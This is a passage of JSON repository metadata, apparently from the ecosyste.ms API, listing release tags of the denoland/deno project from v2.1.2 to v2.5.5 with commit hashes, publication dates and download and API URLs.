"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v